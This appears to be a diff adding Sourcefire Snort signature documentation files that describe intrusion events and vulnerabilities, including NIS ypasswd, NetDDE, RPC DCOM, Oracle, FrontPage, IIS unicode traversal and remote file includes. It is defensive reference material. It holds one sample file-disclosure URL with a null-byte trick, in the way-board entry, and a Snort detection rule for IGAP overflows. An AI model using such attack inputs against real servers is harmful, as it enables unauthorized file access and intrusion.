+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2027.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2027
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
--- /dev/null
+++ b/doc/signatures/3047.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3047
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1872.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1872
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2971.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2971
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1684.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1684
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3263.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3263
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1397.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+1397
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the CGI program way-board.cgi.
+
+--
+Impact:
+Information disclosure. An attacker could have viewed sensitive
+documents and system files.  This could be a precursor to a future attack.
+
+--
+Detailed Information:
+Way-board is a Korean webboard web application.  It contains a
+vulnerability that can allow an attacker to view the contents of any
+file on the system.
+
+--
+Affected Systems:
+	Way Way-Board 2.0
+
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following:
+http://www.victim.com/way-board/way-board.cgi?db=url_to_any_file%00
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/956.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+956
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2963.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2963
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/100000488.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000488
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "app.inc.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"app.inc.php" script used by the "ISPConfig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2902.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2902
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_snapshot_propagation
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3146.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3146
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/960.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+960
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+This event is generated when an attempt is made to retrieve the file
+service.stp. This file contains sensitive information concerning the
+location of other sensitive files that contain group and password
+information.
+
+--
+Affected Systems:
+	CERN and NCSA servers using Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Special FrontPage directories and Storage Locations:
+http://www.rtr.com/fpsupport/serk4.0/apndx05.htm
+
+--
--- /dev/null
+++ b/doc/signatures/100000419.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000419
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ashwebstudio Ashnews" application running on a webserver. Access to the file "ashnews.php" using a remote file being passed as the "pathtoashnews" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "pathtoashnews" parameter in the "ashnews.php" script used by the "Ashwebstudio Ashnews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ashwebstudio Ashnews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/963.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+963
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+This event indicates that an attempt has been made to access the file
+svcacl.cnf which may contain sensitive information about the host and
+applications using the FrontPage extensions.
+
+Svcacl.cnf contains data about permissions and IP address restrictions
+on all of the sub-webs.  This information would be very valuable to a
+hacker and could be used to plan future attacks.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky McAtee <rmcatee@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
--- /dev/null
+++ b/doc/signatures/1491.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1491
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3077.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+3077
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the RNFR command of the IPSwitch WS_FTP server.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that the IPSwitch WS_FTP service
+handles the RNFR command.  An excessively long parameter supplied to the
+command can trigger a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	IPSwitch WS_FTP 4.x, 5.x
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long parameter with the RNFR command,
+possibly causing denial of service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Secunia:
+http://secunia.com/advisories/13334
+
+--
--- /dev/null
+++ b/doc/signatures/2463.txt
@@ -0,0 +1,70 @@
+Rule:
+alert ip any any -> any any (msg:"EXPLOIT IGMP IGAP message
+overflow attempt"; ip_proto:2; byte_test:1,>,63,0; byte_test:1,<,67,0;
+byte_test:1,>,64,13; reference:cve,CAN-2004-0176; reference:bugtraq,9952;
+classtype:attempted-admin; sid:2463; rev:1;)
+
+--
+Sid:
+2463
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Ethereal decode of the Internet Group membership Authentication 
+Protocol (IGAP).
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code as root or
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability associated with particular versions of Ethereal that
+may cause a buffer overflow when a malformed IGAP packet is decoded using Ethereal
+or tethereal.  This may permit the execution of arbitrary code with root or 
+LOCAL_SYSTEM privilege.  The buffer overflow occurs when a larger than expected
+Message Size value is discovered in the IGAP payload.
+
+--
+Affected Systems:
+Any host running Ethereal/tethereal versions 0.10.0 - 0.10.2. 
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed IGAP packet, and if decoded by
+a vulnerable version of Ethereal/tethereal, can cause a buffer overflow and the 
+subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to version 0.10.3 of Ethereal.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176
+
+Bugtraq:
+http://www.securityfocus.com/bid/9952:
+
+--
--- /dev/null
+++ b/doc/signatures/2781.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2781
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/983.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+983
+
+--
+Summary:
+This event is generated when an attempt is made use a unicode encoded representaion of a "\" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when unicode encoding of specific characters is used.  This particular attack uses the unicode encoding of the "\" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can unicode encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
